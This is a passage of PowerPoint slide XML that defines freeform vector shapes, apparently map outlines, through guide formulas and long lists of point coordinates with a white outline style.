                  <a:gd name="T13" fmla="*/ 66 h 98"/>
                  <a:gd name="T14" fmla="*/ 51 w 151"/>
                  <a:gd name="T15" fmla="*/ 62 h 98"/>
                  <a:gd name="T16" fmla="*/ 58 w 151"/>
                  <a:gd name="T17" fmla="*/ 52 h 98"/>
                  <a:gd name="T18" fmla="*/ 68 w 151"/>
                  <a:gd name="T19" fmla="*/ 42 h 98"/>
                  <a:gd name="T20" fmla="*/ 71 w 151"/>
                  <a:gd name="T21" fmla="*/ 39 h 98"/>
                  <a:gd name="T22" fmla="*/ 73 w 151"/>
                  <a:gd name="T23" fmla="*/ 40 h 98"/>
                  <a:gd name="T24" fmla="*/ 75 w 151"/>
                  <a:gd name="T25" fmla="*/ 42 h 98"/>
                  <a:gd name="T26" fmla="*/ 78 w 151"/>
                  <a:gd name="T27" fmla="*/ 46 h 98"/>
                  <a:gd name="T28" fmla="*/ 89 w 151"/>
                  <a:gd name="T29" fmla="*/ 41 h 98"/>
                  <a:gd name="T30" fmla="*/ 88 w 151"/>
                  <a:gd name="T31" fmla="*/ 39 h 98"/>
                  <a:gd name="T32" fmla="*/ 88 w 151"/>
                  <a:gd name="T33" fmla="*/ 37 h 98"/>
                  <a:gd name="T34" fmla="*/ 86 w 151"/>
                  <a:gd name="T35" fmla="*/ 32 h 98"/>
                  <a:gd name="T36" fmla="*/ 89 w 151"/>
                  <a:gd name="T37" fmla="*/ 33 h 98"/>
                  <a:gd name="T38" fmla="*/ 92 w 151"/>
                  <a:gd name="T39" fmla="*/ 32 h 98"/>
                  <a:gd name="T40" fmla="*/ 94 w 151"/>
                  <a:gd name="T41" fmla="*/ 29 h 98"/>
                  <a:gd name="T42" fmla="*/ 91 w 151"/>
                  <a:gd name="T43" fmla="*/ 23 h 98"/>
                  <a:gd name="T44" fmla="*/ 98 w 151"/>
                  <a:gd name="T45" fmla="*/ 23 h 98"/>
                  <a:gd name="T46" fmla="*/ 102 w 151"/>
                  <a:gd name="T47" fmla="*/ 16 h 98"/>
                  <a:gd name="T48" fmla="*/ 108 w 151"/>
                  <a:gd name="T49" fmla="*/ 9 h 98"/>
                  <a:gd name="T50" fmla="*/ 112 w 151"/>
                  <a:gd name="T51" fmla="*/ 0 h 98"/>
                  <a:gd name="T52" fmla="*/ 117 w 151"/>
                  <a:gd name="T53" fmla="*/ 4 h 98"/>
                  <a:gd name="T54" fmla="*/ 121 w 151"/>
                  <a:gd name="T55" fmla="*/ 5 h 98"/>
                  <a:gd name="T56" fmla="*/ 127 w 151"/>
                  <a:gd name="T57" fmla="*/ 8 h 98"/>
                  <a:gd name="T58" fmla="*/ 126 w 151"/>
                  <a:gd name="T59" fmla="*/ 13 h 98"/>
                  <a:gd name="T60" fmla="*/ 125 w 151"/>
                  <a:gd name="T61" fmla="*/ 18 h 98"/>
                  <a:gd name="T62" fmla="*/ 132 w 151"/>
                  <a:gd name="T63" fmla="*/ 16 h 98"/>
                  <a:gd name="T64" fmla="*/ 131 w 151"/>
                  <a:gd name="T65" fmla="*/ 21 h 98"/>
                  <a:gd name="T66" fmla="*/ 139 w 151"/>
                  <a:gd name="T67" fmla="*/ 20 h 98"/>
                  <a:gd name="T68" fmla="*/ 148 w 151"/>
                  <a:gd name="T69" fmla="*/ 25 h 98"/>
                  <a:gd name="T70" fmla="*/ 151 w 151"/>
                  <a:gd name="T71" fmla="*/ 28 h 98"/>
                  <a:gd name="T72" fmla="*/ 148 w 151"/>
                  <a:gd name="T73" fmla="*/ 31 h 98"/>
                  <a:gd name="T74" fmla="*/ 141 w 151"/>
                  <a:gd name="T75" fmla="*/ 32 h 98"/>
                  <a:gd name="T76" fmla="*/ 134 w 151"/>
                  <a:gd name="T77" fmla="*/ 33 h 98"/>
                  <a:gd name="T78" fmla="*/ 141 w 151"/>
                  <a:gd name="T79" fmla="*/ 40 h 98"/>
                  <a:gd name="T80" fmla="*/ 136 w 151"/>
                  <a:gd name="T81" fmla="*/ 44 h 98"/>
                  <a:gd name="T82" fmla="*/ 128 w 151"/>
                  <a:gd name="T83" fmla="*/ 45 h 98"/>
                  <a:gd name="T84" fmla="*/ 126 w 151"/>
                  <a:gd name="T85" fmla="*/ 46 h 98"/>
                  <a:gd name="T86" fmla="*/ 118 w 151"/>
                  <a:gd name="T87" fmla="*/ 43 h 98"/>
                  <a:gd name="T88" fmla="*/ 109 w 151"/>
                  <a:gd name="T89" fmla="*/ 43 h 98"/>
                  <a:gd name="T90" fmla="*/ 100 w 151"/>
                  <a:gd name="T91" fmla="*/ 43 h 98"/>
                  <a:gd name="T92" fmla="*/ 95 w 151"/>
                  <a:gd name="T93" fmla="*/ 48 h 98"/>
                  <a:gd name="T94" fmla="*/ 95 w 151"/>
                  <a:gd name="T95" fmla="*/ 59 h 98"/>
                  <a:gd name="T96" fmla="*/ 89 w 151"/>
                  <a:gd name="T97" fmla="*/ 64 h 98"/>
                  <a:gd name="T98" fmla="*/ 88 w 151"/>
                  <a:gd name="T99" fmla="*/ 72 h 98"/>
                  <a:gd name="T100" fmla="*/ 78 w 151"/>
                  <a:gd name="T101" fmla="*/ 86 h 98"/>
                  <a:gd name="T102" fmla="*/ 69 w 151"/>
                  <a:gd name="T103" fmla="*/ 89 h 98"/>
                  <a:gd name="T104" fmla="*/ 64 w 151"/>
                  <a:gd name="T105" fmla="*/ 92 h 98"/>
                  <a:gd name="T106" fmla="*/ 56 w 151"/>
                  <a:gd name="T107" fmla="*/ 89 h 98"/>
                  <a:gd name="T108" fmla="*/ 49 w 151"/>
                  <a:gd name="T109" fmla="*/ 86 h 98"/>
                  <a:gd name="T110" fmla="*/ 42 w 151"/>
                  <a:gd name="T111" fmla="*/ 90 h 98"/>
                  <a:gd name="T112" fmla="*/ 35 w 151"/>
                  <a:gd name="T113" fmla="*/ 96 h 98"/>
                  <a:gd name="T114" fmla="*/ 28 w 151"/>
                  <a:gd name="T115" fmla="*/ 97 h 98"/>
                  <a:gd name="T116" fmla="*/ 23 w 151"/>
                  <a:gd name="T117" fmla="*/ 95 h 98"/>
                  <a:gd name="T118" fmla="*/ 13 w 151"/>
                  <a:gd name="T119" fmla="*/ 96 h 98"/>
                  <a:gd name="T120" fmla="*/ 4 w 151"/>
                  <a:gd name="T121" fmla="*/ 88 h 98"/>
                  <a:gd name="T122" fmla="*/ 0 w 151"/>
                  <a:gd name="T123" fmla="*/ 81 h 9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51"/>
                  <a:gd name="T187" fmla="*/ 0 h 98"/>
                  <a:gd name="T188" fmla="*/ 151 w 151"/>
                  <a:gd name="T189" fmla="*/ 98 h 98"/>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51" h="98">
                    <a:moveTo>
                      <a:pt x="0" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="81"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36329" name="Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4357" y="2564"/>
                <a:ext cx="116" cy="245"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 116"/>
                  <a:gd name="T1" fmla="*/ 10 h 245"/>
                  <a:gd name="T2" fmla="*/ 16 w 116"/>
                  <a:gd name="T3" fmla="*/ 14 h 245"/>
                  <a:gd name="T4" fmla="*/ 34 w 116"/>
                  <a:gd name="T5" fmla="*/ 10 h 245"/>
                  <a:gd name="T6" fmla="*/ 47 w 116"/>
                  <a:gd name="T7" fmla="*/ 3 h 245"/>
                  <a:gd name="T8" fmla="*/ 58 w 116"/>
                  <a:gd name="T9" fmla="*/ 4 h 245"/>
                  <a:gd name="T10" fmla="*/ 73 w 116"/>
                  <a:gd name="T11" fmla="*/ 6 h 245"/>
                  <a:gd name="T12" fmla="*/ 72 w 116"/>
                  <a:gd name="T13" fmla="*/ 17 h 245"/>
                  <a:gd name="T14" fmla="*/ 82 w 116"/>
                  <a:gd name="T15" fmla="*/ 28 h 245"/>
                  <a:gd name="T16" fmla="*/ 94 w 116"/>
                  <a:gd name="T17" fmla="*/ 31 h 245"/>
                  <a:gd name="T18" fmla="*/ 87 w 116"/>
                  <a:gd name="T19" fmla="*/ 40 h 245"/>
                  <a:gd name="T20" fmla="*/ 76 w 116"/>
                  <a:gd name="T21" fmla="*/ 42 h 245"/>
                  <a:gd name="T22" fmla="*/ 70 w 116"/>
                  <a:gd name="T23" fmla="*/ 54 h 245"/>
                  <a:gd name="T24" fmla="*/ 64 w 116"/>
                  <a:gd name="T25" fmla="*/ 58 h 245"/>
                  <a:gd name="T26" fmla="*/ 57 w 116"/>
                  <a:gd name="T27" fmla="*/ 76 h 245"/>
                  <a:gd name="T28" fmla="*/ 70 w 116"/>
                  <a:gd name="T29" fmla="*/ 90 h 245"/>
                  <a:gd name="T30" fmla="*/ 71 w 116"/>
                  <a:gd name="T31" fmla="*/ 97 h 245"/>
                  <a:gd name="T32" fmla="*/ 91 w 116"/>
                  <a:gd name="T33" fmla="*/ 117 h 245"/>
                  <a:gd name="T34" fmla="*/ 100 w 116"/>
                  <a:gd name="T35" fmla="*/ 122 h 245"/>
                  <a:gd name="T36" fmla="*/ 108 w 116"/>
                  <a:gd name="T37" fmla="*/ 138 h 245"/>
                  <a:gd name="T38" fmla="*/ 116 w 116"/>
                  <a:gd name="T39" fmla="*/ 173 h 245"/>
                  <a:gd name="T40" fmla="*/ 113 w 116"/>
                  <a:gd name="T41" fmla="*/ 186 h 245"/>
                  <a:gd name="T42" fmla="*/ 113 w 116"/>
                  <a:gd name="T43" fmla="*/ 195 h 245"/>
                  <a:gd name="T44" fmla="*/ 105 w 116"/>
                  <a:gd name="T45" fmla="*/ 203 h 245"/>
                  <a:gd name="T46" fmla="*/ 95 w 116"/>
                  <a:gd name="T47" fmla="*/ 207 h 245"/>
                  <a:gd name="T48" fmla="*/ 84 w 116"/>
                  <a:gd name="T49" fmla="*/ 215 h 245"/>
                  <a:gd name="T50" fmla="*/ 76 w 116"/>
                  <a:gd name="T51" fmla="*/ 210 h 245"/>
                  <a:gd name="T52" fmla="*/ 76 w 116"/>
                  <a:gd name="T53" fmla="*/ 219 h 245"/>
                  <a:gd name="T54" fmla="*/ 69 w 116"/>
                  <a:gd name="T55" fmla="*/ 228 h 245"/>
                  <a:gd name="T56" fmla="*/ 63 w 116"/>
                  <a:gd name="T57" fmla="*/ 233 h 245"/>
                  <a:gd name="T58" fmla="*/ 53 w 116"/>
                  <a:gd name="T59" fmla="*/ 240 h 245"/>
                  <a:gd name="T60" fmla="*/ 46 w 116"/>
                  <a:gd name="T61" fmla="*/ 245 h 245"/>
                  <a:gd name="T62" fmla="*/ 45 w 116"/>
                  <a:gd name="T63" fmla="*/ 229 h 245"/>
                  <a:gd name="T64" fmla="*/ 48 w 116"/>
                  <a:gd name="T65" fmla="*/ 221 h 245"/>
                  <a:gd name="T66" fmla="*/ 38 w 116"/>
                  <a:gd name="T67" fmla="*/ 215 h 245"/>
                  <a:gd name="T68" fmla="*/ 52 w 116"/>
                  <a:gd name="T69" fmla="*/ 208 h 245"/>
                  <a:gd name="T70" fmla="*/ 65 w 116"/>
                  <a:gd name="T71" fmla="*/ 208 h 245"/>
                  <a:gd name="T72" fmla="*/ 61 w 116"/>
                  <a:gd name="T73" fmla="*/ 201 h 245"/>
                  <a:gd name="T74" fmla="*/ 69 w 116"/>
                  <a:gd name="T75" fmla="*/ 191 h 245"/>
                  <a:gd name="T76" fmla="*/ 83 w 116"/>
                  <a:gd name="T77" fmla="*/ 184 h 245"/>
                  <a:gd name="T78" fmla="*/ 87 w 116"/>
                  <a:gd name="T79" fmla="*/ 171 h 245"/>
                  <a:gd name="T80" fmla="*/ 85 w 116"/>
                  <a:gd name="T81" fmla="*/ 158 h 245"/>
                  <a:gd name="T82" fmla="*/ 87 w 116"/>
                  <a:gd name="T83" fmla="*/ 139 h 245"/>
                  <a:gd name="T84" fmla="*/ 82 w 116"/>
                  <a:gd name="T85" fmla="*/ 128 h 245"/>
                  <a:gd name="T86" fmla="*/ 82 w 116"/>
                  <a:gd name="T87" fmla="*/ 120 h 245"/>
                  <a:gd name="T88" fmla="*/ 71 w 116"/>
                  <a:gd name="T89" fmla="*/ 111 h 245"/>
                  <a:gd name="T90" fmla="*/ 50 w 116"/>
                  <a:gd name="T91" fmla="*/ 83 h 245"/>
                  <a:gd name="T92" fmla="*/ 32 w 116"/>
                  <a:gd name="T93" fmla="*/ 69 h 245"/>
                  <a:gd name="T94" fmla="*/ 32 w 116"/>
                  <a:gd name="T95" fmla="*/ 61 h 245"/>
                  <a:gd name="T96" fmla="*/ 40 w 116"/>
                  <a:gd name="T97" fmla="*/ 61 h 245"/>
                  <a:gd name="T98" fmla="*/ 43 w 116"/>
                  <a:gd name="T99" fmla="*/ 53 h 245"/>
                  <a:gd name="T100" fmla="*/ 32 w 116"/>
                  <a:gd name="T101" fmla="*/ 40 h 245"/>
                  <a:gd name="T102" fmla="*/ 24 w 116"/>
                  <a:gd name="T103" fmla="*/ 45 h 245"/>
                  <a:gd name="T104" fmla="*/ 14 w 116"/>
                  <a:gd name="T105" fmla="*/ 35 h 245"/>
                  <a:gd name="T106" fmla="*/ 3 w 116"/>
                  <a:gd name="T107" fmla="*/ 19 h 245"/>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116"/>
                  <a:gd name="T163" fmla="*/ 0 h 245"/>
                  <a:gd name="T164" fmla="*/ 116 w 116"/>
                  <a:gd name="T165" fmla="*/ 245 h 245"/>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116" h="245">
                    <a:moveTo>
                      <a:pt x="0" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
